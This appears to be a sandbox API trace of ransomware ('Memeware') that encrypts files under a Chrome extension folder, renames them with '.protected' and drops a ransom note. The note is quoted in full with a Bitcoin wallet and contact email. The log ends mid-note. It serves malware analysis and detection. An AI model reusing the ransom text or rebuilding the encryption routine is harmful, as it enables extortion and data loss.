dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.374] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.374] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.375] lstrlenA (lpString="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") returned 684 [0083.375] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.375] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.375] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.375] CloseHandle (hObject=0x164) returned 1 [0083.375] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.375] lstrcmpiW (lpString1="bn", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1="bn", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned 150 [0083.376] lstrcmpW (lpString1="bn", lpString2=".") returned 1 [0083.376] lstrcmpW (lpString1="bn", lpString2="..") returned 1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*") returned 152 [0083.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.376] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\.") returned 152 [0083.376] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.376] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.376] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\..") returned 153 [0083.376] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.376] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.376] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.376] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0083.376] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.377] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.377] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.377] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json") returned 164 [0083.377] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.377] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.380] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.380] CloseHandle (hObject=0x168) returned 1 [0083.380] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected") returned 174 [0083.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\messages.json.protected")) returned 1 [0083.381] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.381] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.381] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\RESTORE_FILES.txt") returned 168 [0083.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.382] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.382] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.383] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.383] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.383] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.383] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.383] CloseHandle (hObject=0x164) returned 1 [0083.385] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0083.385] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0083.385] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca") returned 150 [0083.385] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0083.385] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0083.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*") returned 152 [0083.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.385] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.385] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.385] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\.") returned 152 [0083.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.385] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.385] lstrcmpiW (lpString1="..", lpString2="Program 
Files (x86)") returned -1 [0083.386] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.386] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.386] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\..") returned 153 [0083.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.386] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.386] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.386] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.386] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.386] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.386] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.386] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.386] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.387] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json") returned 164 [0083.387] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.387] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.394] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.394] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.395] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.395] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.395] CloseHandle (hObject=0x168) returned 1 [0083.398] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected") returned 174 [0083.398] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\messages.json.protected")) returned 1 [0083.399] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) 
returned 0 [0083.399] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.399] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\RESTORE_FILES.txt") returned 168 [0083.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.399] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur 